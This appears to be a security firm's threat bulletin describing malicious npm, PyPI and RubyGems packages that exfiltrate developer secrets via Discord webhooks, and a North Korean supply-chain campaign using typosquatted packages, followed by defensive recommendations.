Cyber security researchers have uncovered multiple malicious packages distributed through npm, PyPI, and RubyGems that secretly send stolen developer data to Discord channels. The attackers use Discord webhooks as a command-and-control (C2) mechanism, exploiting their simplicity and lack of authentication requirements. Since webhook URLs are “write-only,” defenders cannot easily review or delete the stolen data once it’s transmitted.
Several packages were found misusing this technique. The npm package mysql-dumpdiscord exfiltrates sensitive configuration files such as .env and config.json; nodejs.discord uses webhooks for alerts; Python packages malinssx, malicus, and maliinn send data to Discord channels upon installation; and the RubyGem sqlcommenter_rails transmits host information and critical files like /etc/passwd to an attacker-controlled webhook. By using Discord webhooks, threat actors avoid the cost and detection risks of traditional infrastructure while blending into normal network traffic.
In parallel, researchers also detected a large-scale campaign by North Korean threat actors linked to Contagious Interview, which flooded npm with over 300 malicious packages downloaded more than 50,000 times. The group used fake developer personas to lure victims - mainly Web3, crypto, and blockchain developers - into cloning repositories that referenced these infected packages. Once executed, the malware, including BeaverTail and InvisibleFerret, harvested credentials, crypto wallets, keystrokes, and screenshots, often via typosquatted libraries mimicking legitimate ones like dotenv or ethers.js.
This campaign shows an increasingly industrialized approach to software supply chain attacks, where removing individual malicious packages isn’t enough if the underlying publisher accounts remain active.
Developers and organisations should immediately audit their projects for any dependencies matching the listed malicious packages and remove them. Avoid installing packages from unverified or newly created accounts. Use tools that monitor for typosquatting and suspicious dependencies, and isolate build environments from sensitive credentials. Regularly rotate API keys and .env files and enforce multi-layered monitoring to detect exfiltration attempts through legitimate-looking channels such as Discord.
If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively Get in touch to find out how you can protect your organisation.